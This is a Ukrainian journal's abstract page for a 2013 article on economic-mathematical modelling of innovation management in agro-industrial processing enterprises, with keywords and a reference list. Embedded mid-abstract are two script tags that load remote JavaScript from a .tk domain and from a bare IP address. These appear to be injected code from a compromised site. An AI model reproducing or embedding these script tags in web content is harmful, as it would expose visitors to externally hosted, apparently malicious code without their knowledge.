ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.46:519.86;631.152:004
Інноваційна діяльність та інтелектуальний капітал

Економіко-математичне моделювання в управлінні інноваційними процесами переробних підприємств АПК / Бабенко В. О. // Економіка АПК. - 2013. - № 1 - С. 90

Досліджено теоретико-методологічні аспекти управління інноваційними процесами підприємств АПК. Розроблено еко- номіко-математичну модель задачі управління інноваційними процесами переробних підприємств АПК, сформовано обмеження та критерії якості для оцінки процесу, що досліджується. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: економіко-математичне моделювання, управління переробних підприємств АПК, інноваційні процеси, динамічна оптимізація, оптимальне управління, обмеження процесу управління, критерії якості, дискретна оптимізація

Список використаних джерел

 1. Бабенко В.А. Методика экономико-математического моделирования оптимизации управления инновационными процессами на предприятиях АПК // Modeling and Analysis of Safety and Risk in Complex Systems / Proceedings of the Ninth International Scientific School MASR - 2011 (Saint-Petersburg, Russia, June, 28 - July 02, 2011) / SPb.: SUAI, SPb., 2011. - 426 p. - P. 231 - 236.
 2. Бабенко В.А. Теоретические аспекты и методические подходы к оценке влияния природных рисков на производство сельскохозяйственной продукции // Збірник наукових праць Таврійського державного агротехнологічного університету (економічні науки). - №3 (11). Мелітополь, 2010. - С. 62-69.
 3. Витлинский В.В. Моделирование и управление инновационными технологиями на предприятиях АПК / В. В. Витлинский, В. А. Бабенко // Анализ, моделирование, управление, развитие экономических систем: сб. науч. трудов VI Междунар. школы-симпозиума АМУР-2012. - Севастополь, 17-23 сент. 2012; отв. ред. М.Ю. Куссый, А.В. Сигал. - Симферополь: ТНУ им. В.И.Вернадского, 2012. - С. 79-83.
 4. Деловой мир. Словарь-справочник предпринимателя ; под ред. Л.В. Балдина, А.А. Чичановского. - М.: Изд.-произв. фирма «Зевс», 1992. - 293 с.
 5. Закон України «Про внесення змін до Закону України «Про пріоритетні напрями розвитку науки і техніки» від 09.09.2010 № 2519-VI // Відом. Верхов. Ради України від 28.01.2011 2011 p., № 4, стор. 123, стаття 23.
 6. Закон України «Про пріоритетні напрями інноваційної діяльності в Україні» 08.09.2011 № 3715-VI // Голос України від 01.10.2011 № 183.
 7. Зайцев НА. Экономика организации / Н. А. Зайцев. - М.: Экзамен, 2000. - 768 с.
 8. Кинг У. Стратегическое планирование и хозяйственная политика/ Кинг У., Клиланд Д. [пер с англ.] - М.: Прогресс, 1993. - 400 с.
 9. Лотов А.В. Введение в экономико-математическое моделирование / А.В. Лотов. - М.: Наука, 1984. - 392 с.
 10. Моргенштерн О. Теория игр и экономическое поведение / О. Моргенштерн, Дж. Нейман. - М.: Наука, 1970. - 708 с.
 11. Пропой А.И. Элементы теории оптимальных дискретных процессов / А.И. Пропой. - М.: Наука, 1973. - 256 с.
 12. Шориков А.Ф. Минимаксное оценивание и управление в дискретных динамических системах / А.Ф. Шориков. - Екатеринбург: Изд-во Урал. ун-та, 1997. - 242 с.
Читати статтю: 13_01_13.pdf